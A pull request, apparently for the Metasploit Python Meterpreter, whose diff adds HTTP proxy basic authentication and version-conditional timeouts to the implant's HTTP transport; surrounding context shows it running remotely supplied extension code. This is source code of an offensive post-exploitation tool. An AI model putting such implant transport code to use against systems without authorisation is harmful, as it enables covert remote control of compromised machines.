### PR TITLE
Add proxy authentication support to the Python Meterpreter

### DIFF
--- a/python/meterpreter/meterpreter.py
+++ b/python/meterpreter/meterpreter.py
@@ -1005,8 +1005,11 @@ class HttpTransport(Transport):
         packet = None
         xor_key = None
         request = urllib.Request(self.url, None, self._http_request_headers)
+        urlopen_kwargs = {}
+        if sys.version_info > (2, 6):
+            urlopen_kwargs['timeout'] = self.communication_timeout
         try:
-            url_h = urllib.urlopen(request, timeout=self.communication_timeout)
+            url_h = urllib.urlopen(request, **urlopen_kwargs)
             packet = url_h.read()
             for _ in range(1):
                 if packet == '':
@@ -1035,7 +1038,10 @@ class HttpTransport(Transport):
 
     def _send_packet(self, packet):
         request = urllib.Request(self.url, packet, self._http_request_headers)
-        url_h = urllib.urlopen(request, timeout=self.communication_timeout)
+        urlopen_kwargs = {}
+        if sys.version_info > (2, 6):
+            urlopen_kwargs['timeout'] = self.communication_timeout
+        url_h = urllib.urlopen(request, **urlopen_kwargs)
         response = url_h.read()
 
     def patch_uri_path(self, new_path):

--- a/python/meterpreter/meterpreter.py
+++ b/python/meterpreter/meterpreter.py
@@ -22,7 +22,7 @@ else:
     has_windll = hasattr(ctypes, 'windll')
 
 try:
-    urllib_imports = ['ProxyHandler', 'Request', 'build_opener', 'install_opener', 'urlopen']
+    urllib_imports = ['ProxyBasicAuthHandler', 'ProxyHandler', 'HTTPSHandler', 'Request', 'build_opener', 'install_opener', 'urlopen']
     if sys.version_info[0] < 3:
         urllib = __import__('urllib2', fromlist=urllib_imports)
     else:
@@ -969,6 +969,7 @@ class HttpTransport(Transport):
             opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
         if proxy:
             opener_args.append(urllib.ProxyHandler({scheme: proxy}))
+            opener_args.append(urllib.ProxyBasicAuthHandler())
         self.proxy = proxy
         opener = urllib.build_opener(*opener_args)
         opener.addheaders = []
@@ -1423,7 +1424,7 @@ class PythonMeterpreter(object):
             libname = match.group(1)
 
         self.last_registered_extension = None
-        symbols_for_extensions = {'meterpreter':self}
+        symbols_for_extensions = {'meterpreter': self}
         symbols_for_extensions.update(EXPORTED_SYMBOLS)
         i = code.InteractiveInterpreter(symbols_for_extensions)
         i.runcode(compile(data_tlv['value'], 'ext_server_' + libname + '.py', 'exec'))


### PR DESCRIPTION
This adds support for using HTTP Proxies that require authentication to the Python Meterpreter. There will be a corresponding Metasploit Framework pull request that I'll open shortly with testing steps.

This addresses #386.